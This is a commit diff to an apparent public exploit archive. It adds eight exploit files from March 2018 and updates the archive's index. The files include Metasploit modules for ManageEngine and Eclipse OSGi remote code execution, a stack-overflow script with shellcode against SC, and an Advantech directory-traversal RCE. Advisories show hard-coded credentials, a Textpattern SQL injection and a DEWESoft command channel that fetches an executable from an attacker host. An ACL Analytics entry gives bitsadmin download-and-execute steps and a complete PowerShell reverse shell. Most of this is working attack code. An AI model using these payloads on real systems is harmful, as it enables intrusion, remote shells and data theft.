DB: 2018-03-13
8 changes to exploits/shellcodes Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader SC 7.16 - Stack-Based Buffer Overflow DEWESoft X3 SP1 (64-bit) - Remote Command Execution Eclipse Equinoxe OSGi Console - Command Execution (Metasploit) ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit) Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials TextPattern 4.6.2 - 'qty' SQL Injection Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution
This commit is contained in:
parent
5947825a84
commit
3f6d16d5c3
9 changed files with 709 additions and 1 deletions
117
exploits/java/webapps/44274.rb
Executable file
117
exploits/java/webapps/44274.rb
Executable file
|
@ -0,0 +1,117 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "ManageEngine Applications Manager Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits command injection vulnerability in the ManageEngine Application Manager product.
|
||||
An unauthenticated user can execute a operating system command under the context of privileged user.
|
||||
|
||||
Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
|
||||
by accessing given system. This endpoint calls a several internal classes and then executes powershell script
|
||||
without validating user supplied parameter when the given system is OfficeSharePointServer.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-7890'],
|
||||
['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10,
|
||||
'RPORT' => 9090
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x22"
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Mar 7 2018',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
|
||||
'vars_post' => {
|
||||
'method' => 'testCredentialForConfMonitors',
|
||||
'type' => 'OfficeSharePointServer',
|
||||
'montype' => 'OfficeSharePointServer',
|
||||
'isAgentEnabled' => 'NO',
|
||||
'isAgentAssociated' => 'false',
|
||||
'displayname' => Rex::Text.rand_text_alpha(10),
|
||||
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
|
||||
'Version' => '2013',
|
||||
'Powershell' => 'True', # :-)
|
||||
'CredSSP' => 'False',
|
||||
'SPType' => 'SPServer',
|
||||
'CredentialDetails' => 'nocm',
|
||||
'Password' => Rex::Text.rand_text_alpha(3),
|
||||
'UserName' => Rex::Text.rand_text_alpha(3)
|
||||
}
|
||||
})
|
||||
if res && res.body.include?('Kindly check the credentials and try again')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
powershell_options = {
|
||||
encode_final_payload: true,
|
||||
remove_comspec: true
|
||||
}
|
||||
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
|
||||
|
||||
print_status('Triggering the vulnerability')
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
|
||||
'vars_post' => {
|
||||
'method' => 'testCredentialForConfMonitors',
|
||||
'type' => 'OfficeSharePointServer',
|
||||
'montype' => 'OfficeSharePointServer',
|
||||
'isAgentEnabled' => 'NO',
|
||||
'isAgentAssociated' => 'false',
|
||||
'displayname' => Rex::Text.rand_text_alpha(10),
|
||||
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
|
||||
'Version' => '2013',
|
||||
'Powershell' => 'True', # :-)
|
||||
'CredSSP' => 'False',
|
||||
'SPType' => 'SPServer',
|
||||
'CredentialDetails' => 'nocm',
|
||||
'Password' => Rex::Text.rand_text_alpha(3),
|
||||
'UserName' => "$(#{p})"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
78
exploits/linux/local/44279.py
Executable file
78
exploits/linux/local/44279.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
|
||||
# Bug found using Exploit Pack - Local fuzzer feature.
|
||||
#
|
||||
# Tested on: GNU/Linux - Kali Linux
|
||||
# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb
|
||||
#
|
||||
# Description: SC v7.16 is prone to a basic stack-based buffer overflow
|
||||
# vulnerability because the application fails to perform adequate
|
||||
# boundary-checks on user-supplied input.
|
||||
#
|
||||
# An attacker could exploit this issue to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Vendor homepage: SC v7.16 -
|
||||
http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html
|
||||
#
|
||||
#
|
||||
#[----------------------------------registers-----------------------------------]
|
||||
#EAX: 0x0
|
||||
#EBX: 0x41414141 ('AAAA')
|
||||
#ECX: 0x42 ('B')
|
||||
#EDX: 0x1
|
||||
#ESI: 0x41414141 ('AAAA')
|
||||
#EDI: 0x41414141 ('AAAA')
|
||||
#EBP: 0x41414141 ('AAAA')
|
||||
#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
|
||||
#EIP: 0x41424344 ('DCBA')
|
||||
#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT
|
||||
direction overflow)
|
||||
#[-------------------------------------code-------------------------------------]
|
||||
#Invalid $PC address: 0x41424344
|
||||
#[------------------------------------stack-------------------------------------]
|
||||
#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
|
||||
#0004| 0xbfffee34 --> 0x1
|
||||
#0008| 0xbfffee38 --> 0x0
|
||||
#0012| 0xbfffee3c --> 0x0
|
||||
#0016| 0xbfffee40 --> 0xf63d4e2e
|
||||
#0020| 0xbfffee44 --> 0xb7fe4bf9 (<do_lookup_x+1689>: add esp,0x20)
|
||||
#0024| 0xbfffee48 --> 0x1
|
||||
#0028| 0xbfffee4c --> 0x1
|
||||
#[------------------------------------------------------------------------------]
|
||||
#Legend: code, data, rodata, value
|
||||
#Stopped reason: SIGSEGV
|
||||
#0x41424344 in ?? ()
|
||||
#gdb-peda$ backtrace
|
||||
##0 0x41424344 in ?? ()
|
||||
##1 0xbffff100 in ?? ()
|
||||
#Backtrace stopped: previous frame inner to this frame (corrupt stack?)
|
||||
#gdb-peda$
|
||||
#
|
||||
#==2332==
|
||||
#==2332== Jump to the invalid address stated on the next line
|
||||
#==2332== at 0x41424344: ???
|
||||
#==2332== Address 0x41424344 is not stack'd, malloc'd or (recently) free'd
|
||||
#==2332==
|
||||
#==2332==
|
||||
#==2332== Process terminating with default action of signal 11 (SIGSEGV)
|
||||
#==2332== Access not within mapped region at address 0x41424344
|
||||
#==2332== at 0x41424344: ???
|
||||
import subprocess
|
||||
import os
|
||||
|
||||
buffersize = 1052
|
||||
nopsled = "\x90"
|
||||
# Shell
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
eip = "\x10\xf0\xff\xbf"
|
||||
buffer = nopsled * (buffersize-len(shellcode)) + eip
|
||||
|
||||
try:
|
||||
subprocess.call(["/usr/bin/sc", buffer])
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "SC binary not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
118
exploits/multiple/remote/44280.rb
Executable file
118
exploits/multiple/remote/44280.rb
Executable file
|
@ -0,0 +1,118 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
require 'base64'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
TELNET_IAC = Msf::Exploit::Remote::Telnet
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Eclipse Equinoxe OSGi Console Command Execution',
|
||||
'Description' => %q{
|
||||
Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
|
||||
'fork' command to execute arbitrary commands on the remote system..
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Quentin Kaiser <kaiserquentin@gmail.com>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
|
||||
],
|
||||
'Platform' => %w{ linux win },
|
||||
'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
|
||||
'Targets'=> [
|
||||
[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
|
||||
[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
|
||||
],
|
||||
'CmdStagerFlavor' => [ 'bourne' ],
|
||||
'DisclosureDate' => 'Feb 13 2018',
|
||||
'DefaultTarget' => 0))
|
||||
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
|
||||
register_options([
|
||||
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
res = sock.get_once
|
||||
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
|
||||
# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
|
||||
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
|
||||
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
|
||||
res = sock.get_once
|
||||
end
|
||||
disconnect
|
||||
if res && res == "osgi> "
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
print_status("Accessing the OSGi console ...")
|
||||
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
|
||||
end
|
||||
|
||||
if target['Platform'] == "win" then
|
||||
exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
|
||||
else
|
||||
execute_cmdstager({:flavor => :bourne})
|
||||
end
|
||||
|
||||
print_status("#{rhost}:#{rport} - Waiting for session...")
|
||||
|
||||
(datastore['TIME_WAIT']).times do
|
||||
Rex.sleep(1)
|
||||
# Success! session is here!
|
||||
break if session_created?
|
||||
end
|
||||
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
def exec_command(cmd)
|
||||
connect
|
||||
res = sock.get_once
|
||||
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
|
||||
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
|
||||
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
|
||||
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
|
||||
res = sock.get_once
|
||||
end
|
||||
print_status("Exploiting...")
|
||||
sock.put("#{cmd}\r\n")
|
||||
res = sock.get
|
||||
sock.put("disconnect\r\n")
|
||||
res = sock.get
|
||||
sock.put("y\r\n")
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts={})
|
||||
cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
|
||||
# Runtime.getRuntime().exec() workaround on Linux. Requires bash.
|
||||
exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
|
||||
end
|
||||
end
|
36
exploits/multiple/webapps/44276.txt
Normal file
36
exploits/multiple/webapps/44276.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
|
||||
|
||||
|
||||
Vendor: Prisma Industriale S.r.l.
|
||||
Product web page: https://www.prismaindustriale.com
|
||||
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
|
||||
|
||||
Summary: Web Administration of Machine.
|
||||
|
||||
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
|
||||
an attacker to effectively bypass authentication of PrismaWEB with administrator
|
||||
privileges. The credentials can be disclosed by simply navigating to the login_par.js
|
||||
JavaScript page that holds the username and password for the management interface that
|
||||
are being used via the Login() function in /scripts/functions_cookie.js script.
|
||||
|
||||
Tested on: HMS AnyBus-S WebServer
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2018-5453
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
|
||||
|
||||
06.02.2018
|
||||
|
||||
---
|
||||
|
||||
|
||||
$ curl http://10.10.10.70/user/scripts/login_par.js
|
||||
// JavaScript Document
|
||||
// 11 Dicembre 2009 Release 1.0 Rev.10
|
||||
|
||||
var txtChkUser = "prismaweb"; // Nome utente Login
|
||||
var txtChkPassword = "prisma"; // Password Login
|
87
exploits/php/webapps/44277.txt
Normal file
87
exploits/php/webapps/44277.txt
Normal file
|
@ -0,0 +1,87 @@
|
|||
=============================================
|
||||
MGC ALERT 2018-002
|
||||
- Original release date: February 12, 2018
|
||||
- Last revised: March 12, 2018
|
||||
- Discovered by: Manuel García Cárdenas
|
||||
- Severity: 7,1/10 (CVSS Base Score)
|
||||
- CVE-ID: CVE-2018-7474
|
||||
=============================================
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
SQL Injection in Textpattern <= 4.6.2
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
Textpattern is a free and open-source content management system (CMS) based
|
||||
on PHP and MySQL, originally developed by Dean Allen and now developed by
|
||||
Team Textpattern.
|
||||
|
||||
III. DESCRIPTION
|
||||
-------------------------
|
||||
This bug was found using the portal with authentication as administrator.
|
||||
|
||||
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
|
||||
protocol to interact with the application.
|
||||
|
||||
It is possible to inject SQL code in the variable "qty" on the page
|
||||
"index.php".
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
-------------------------
|
||||
The following URL's and parameters have been confirmed to all suffer from
|
||||
SQL injection.
|
||||
|
||||
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
|
||||
|
||||
Note: the variable "_txp_token" doest not work as a anti-csrf.
|
||||
|
||||
POC:
|
||||
|
||||
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'%
|
||||
5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
-------------------------
|
||||
Public defacement, confidential data leakage, and database server
|
||||
compromise can result from these attacks. Client systems can also be
|
||||
targeted, and complete compromise of these client systems is also possible.
|
||||
|
||||
VI. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
Textpattern <= 4.6.2
|
||||
|
||||
VII. SOLUTION
|
||||
-------------------------
|
||||
Disable website until a fix is available.
|
||||
|
||||
VIII. REFERENCES
|
||||
-------------------------
|
||||
https://textpattern.com/
|
||||
|
||||
IX. CREDITS
|
||||
-------------------------
|
||||
This vulnerability has been discovered and reported
|
||||
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
|
||||
|
||||
X. REVISION HISTORY
|
||||
-------------------------
|
||||
February 12, 2018 1: Initial release
|
||||
March 12, 2018 2: Revision to send to lists
|
||||
|
||||
XI. DISCLOSURE TIMELINE
|
||||
-------------------------
|
||||
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||
February 12, 2018 2: Send to vendor without response
|
||||
February 26, 2018 3: Second email to vendor without response
|
||||
March 12, 2018 4: Send to the Full-Disclosure lists
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
|
||||
XIII. ABOUT
|
||||
-------------------------
|
||||
Manuel Garcia Cardenas
|
||||
Pentester
|
100
exploits/windows/remote/44275.txt
Normal file
100
exploits/windows/remote/44275.txt
Normal file
|
@ -0,0 +1,100 @@
|
|||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
|
||||
[+] ISR: Apparition Security
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=============
|
||||
www.dewesoft.com
|
||||
|
||||
|
||||
Product:
|
||||
===========
|
||||
DEWESoft X3 SP1 (64-bit) installer - X3
|
||||
DEWESoft_FULL_X3_SP1_64BIT.exe
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Remote Internal Command Access
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2018-7756
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
|
||||
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
|
||||
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
|
||||
a "SETFIREWALL Off" command.
|
||||
|
||||
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
|
||||
|
||||
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
|
||||
|
||||
RUN <ANY EXE>
|
||||
RUNEX <ANY EXE>
|
||||
GETFIREWALL
|
||||
SETFIREWALL Off
|
||||
KILL <PROCESS>
|
||||
USERNAME
|
||||
SHUTDOWN
|
||||
SENDKEYS
|
||||
LIST
|
||||
DWPIPE
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
TELNET x.x.x.x 1999
|
||||
RUN calc.exe
|
||||
|
||||
OR
|
||||
|
||||
Launch the victims browser and send them to website for a drive-by download etc.
|
||||
|
||||
TELNET x.x.x.x 1999
|
||||
RUN http://ATTACKER-IP/DOOM.exe
|
||||
|
||||
Then from the TELNET session execute it from Downloads directory.
|
||||
|
||||
runexe c:\Users\victim\Downloads\DOOM.exe
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: February 9, 2018
|
||||
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
|
||||
Inform vendor of disclosure timeline : February 19, 2018
|
||||
No further replys, update or addressing of the issue by vendor.
|
||||
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
|
||||
March 10, 2018 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
74
exploits/windows/webapps/44278.py
Executable file
74
exploits/windows/webapps/44278.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/python2.7
|
||||
|
||||
# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
|
||||
# Date: 03-11-2018
|
||||
# Exploit Author: Chris Lyne (@lynerc)
|
||||
# Vendor Homepage: www.advantech.com
|
||||
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
|
||||
# Version: Advantech WebAccess 8.2-2017.08.18
|
||||
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
|
||||
# CVE : CVE-2017-16720
|
||||
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
|
||||
|
||||
import sys, struct
|
||||
from impacket import uuid
|
||||
from impacket.dcerpc.v5 import transport
|
||||
|
||||
def call(dce, opcode, stubdata):
|
||||
dce.call(opcode, stubdata)
|
||||
res = -1
|
||||
try:
|
||||
res = dce.recv()
|
||||
except Exception, e:
|
||||
print "Exception encountered..." + str(e)
|
||||
sys.exit(1)
|
||||
return res
|
||||
|
||||
if len(sys.argv) != 2:
|
||||
print "Provide only host arg"
|
||||
sys.exit(1)
|
||||
|
||||
port = 4592
|
||||
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
|
||||
version = "1.0"
|
||||
|
||||
host = sys.argv[1]
|
||||
|
||||
string_binding = "ncacn_ip_tcp:%s" % host
|
||||
trans = transport.DCERPCTransportFactory(string_binding)
|
||||
trans.set_dport(port)
|
||||
|
||||
dce = trans.get_dce_rpc()
|
||||
dce.connect()
|
||||
|
||||
print "Binding..."
|
||||
iid = uuid.uuidtup_to_bin((interface, version))
|
||||
dce.bind(iid)
|
||||
|
||||
print "...1"
|
||||
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
|
||||
call(dce, 2, stubdata)
|
||||
|
||||
print "...2"
|
||||
stubdata = struct.pack("<I", 0x02)
|
||||
res = call(dce, 4, stubdata)
|
||||
if res == -1:
|
||||
print "Something went wrong"
|
||||
sys.exit(1)
|
||||
res = struct.unpack("III", res)
|
||||
|
||||
if (len(res) < 3):
|
||||
print "Received unexpected length value"
|
||||
sys.exit(1)
|
||||
|
||||
print "...3"
|
||||
# ioctl 0x2711
|
||||
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
|
||||
command = "..\\..\\windows\\system32\\calc.exe"
|
||||
fmt = "<" + str(0x204) + "s"
|
||||
stubdata += struct.pack(fmt, command)
|
||||
call(dce, 1, stubdata)
|
||||
|
||||
print "\nDid it work?"
|
||||
|
||||
dce.disconnect()
|
90
exploits/windows/webapps/44281.txt
Normal file
90
exploits/windows/webapps/44281.txt
Normal file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: Arbitrary Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 03-07-2018
|
||||
# Exploit Author: Clutchisback1
|
||||
# Vendor Homepage: https://www.acl.com
|
||||
# Software Link: https://www.acl.com/products/acl-analytics/
|
||||
# Version: 11.x - 13.0.0.579
|
||||
# Tested on: Windows 7 pro SP1 x86
|
||||
|
||||
#########################################################################
|
||||
#
|
||||
#
|
||||
# Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
|
||||
# Welcome to A_C_SHELLLLLL!!
|
||||
# All Glory to Yeshua
|
||||
# Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
|
||||
# and my Offsec Mentor: T0w3ntum introducing me to netsec!
|
||||
# (I have consent for those mentions :D)
|
||||
#
|
||||
#
|
||||
#########################################################################
|
||||
|
||||
|
||||
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
|
||||
|
||||
|
||||
EXECUTE "powershell C:\temp\shell.ps1"
|
||||
|
||||
Description/Usage:
|
||||
Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
|
||||
The second `Execute` command will execute the stored payload
|
||||
|
||||
|
||||
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
|
||||
|
||||
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
|
||||
if($socket -eq $null){exit 1}
|
||||
$stream = $socket.GetStream();
|
||||
$writer = new-object System.IO.StreamWriter($stream);
|
||||
$buffer = new-object System.Byte[] 1024;
|
||||
$encoding = new-object System.Text.AsciiEncoding;
|
||||
do
|
||||
{
|
||||
$writer.Flush();
|
||||
$read = $null;
|
||||
$res = ""
|
||||
while($stream.DataAvailable -or $read -eq $null) {
|
||||
$read = $stream.Read($buffer, 0, 1024)
|
||||
}
|
||||
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
|
||||
if(!$out.equals("exit")){
|
||||
$args = "";
|
||||
if($out.IndexOf(' ') -gt -1){
|
||||
$args = $out.substring($out.IndexOf(' ')+1);
|
||||
$out = $out.substring(0,$out.IndexOf(' '));
|
||||
if($args.split(' ').length -gt 1){
|
||||
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
|
||||
$pinfo.FileName = "cmd.exe"
|
||||
$pinfo.RedirectStandardError = $true
|
||||
$pinfo.RedirectStandardOutput = $true
|
||||
$pinfo.UseShellExecute = $false
|
||||
$pinfo.Arguments = "/c $out $args"
|
||||
$p = New-Object System.Diagnostics.Process
|
||||
$p.StartInfo = $pinfo
|
||||
$p.Start() | Out-Null
|
||||
$p.WaitForExit()
|
||||
$stdout = $p.StandardOutput.ReadToEnd()
|
||||
$stderr = $p.StandardError.ReadToEnd()
|
||||
if ($p.ExitCode -ne 0) {
|
||||
$res = $stderr
|
||||
} else {
|
||||
$res = $stdout
|
||||
}
|
||||
}
|
||||
else{
|
||||
$res = (&"$out" "$args") | out-string;
|
||||
}
|
||||
}
|
||||
else{
|
||||
$res = (&"$out") | out-string;
|
||||
}
|
||||
if($res -ne $null){
|
||||
$writer.WriteLine($res)
|
||||
}
|
||||
}
|
||||
}While (!$out.equals("exit"))
|
||||
$writer.close();
|
||||
$socket.close();
|
||||
$stream.Dispose()
|
||||
END
|
|
@ -9573,7 +9573,7 @@ id,file,description,date,author,type,platform,port
|
|||
44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
|
||||
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
|
||||
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
|
||||
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
|
||||
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware,
|
||||
44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
|
||||
38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
|
||||
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
|
||||
|
@ -9587,6 +9587,7 @@ id,file,description,date,author,type,platform,port
|
|||
44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
|
||||
